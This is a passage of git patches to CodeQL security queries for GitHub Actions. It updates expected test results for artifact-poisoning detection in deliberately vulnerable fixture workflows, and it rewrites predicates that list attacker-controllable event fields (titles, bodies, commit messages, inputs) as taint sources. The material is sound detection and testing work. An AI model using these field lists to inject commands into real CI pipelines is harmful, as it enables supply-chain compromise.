.github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| 
.github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E 
"*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ba635b1d74de..5bea5c7e52cf 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
@@ -1,56 +1,56 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| 
.github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses 
Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| 
.github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E 
"*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Run Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Run Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | From 00f6ff8c0155c064c5e1733aaf3cc4710755185d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 27 Apr 2024 11:02:33 +0200 Subject: [PATCH 225/707] Split sources by taint type --- .../codeql/actions/dataflow/FlowSources.qll | 204 ++++-- .../actions/security/EnvVarInjectionQuery.qll | 8 - ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 14 +- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 +- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 6 + ql/src/Security/CWE-077/EnvVarInjection.ql | 9 +- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 + .../CWE-077/PrivilegedEnvVarInjection.ql | 9 +- ql/test/library-tests/test.actual | 598 ------------------ ql/test/library-tests/test.expected | 136 ++-- .../CWE-077/.github/workflows/test1.yml | 2 + .../CWE-077/.github/workflows/test4.yml | 4 + .../Security/CWE-077/EnvVarInjection.expected | 3 + .../PrivilegedEnvPathInjection.expected | 1 - .../PrivilegedEnvVarInjection.expected | 3 + 31 files changed, 313 insertions(+), 774 deletions(-) delete mode 100644 ql/test/library-tests/test.actual diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dc376765a8a..754d28cb93e6 100644 
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,3 @@ -private import actions -private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery 
@@ -22,30 +20,56 @@ abstract class RemoteFlowSource extends SourceNode { } bindingset[context] -private predicate isExternalUserControlled(string context) { - exists(string reg | reg = "github\\.event" | +private predicate titleEvent(string context) { + exists(string reg | + reg = + [ + // title + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", + "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledIssue(string context) { - exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | +private predicate urlEvent(string context) { + exists(string reg | + reg = + [ + // url + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledPullRequest(string context) { +private predicate textEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", - "github\\.event\\.pull_request\\.head\\.label", - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.repo\\.description", - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" + // text + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + 
"github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + "github\\.event\\.inputs\\[[0-9]+\\]", // input + "github\\.event\\.inputs", // input ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
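Review bot: None of the new `titleEvent`, `urlEvent` and `textEvent` predicates carries a QLDoc, so a query author cannot tell what a category is meant to guarantee about the value (which characters it may contain and which sinks it is therefore still dangerous for); the same applies to the sibling predicates in the following hunks. Suggest a one-liner above each, e.g. `/** Holds if `context` is a user-controlled event field carrying free-form text (issue/PR/discussion bodies, commit messages, dispatch payloads and inputs). */` for `textEvent`. The `client_payload` and `inputs` entries are only listed in their bare and numerically-indexed forms, while dispatch payloads and inputs are JSON objects addressed by key (`github.event.inputs.<name>`); whether that form is matched depends on how `Utils::wrapRegexp` anchors the pattern, which is not visible here, and the bare `github\\.event` entry in `jsonEvent` further down raises the same question, so a test pinning both spellings would settle it. `textEvent`'s closing lines fall in the next hunk.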
@@ -53,22 +77,59 @@ private predicate isExternalUserControlledPullRequest(string context) { } bindingset[context] -private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) +private predicate repoNameEvent(string context) { + exists(string reg | + reg = + [ + // repo name + // Owner: All characters must be either a hyphen (-) or alphanumeric + // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) } bindingset[context] -private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) +private predicate branchEvent(string context) { + exists(string reg | + reg = + [ + // branch + // 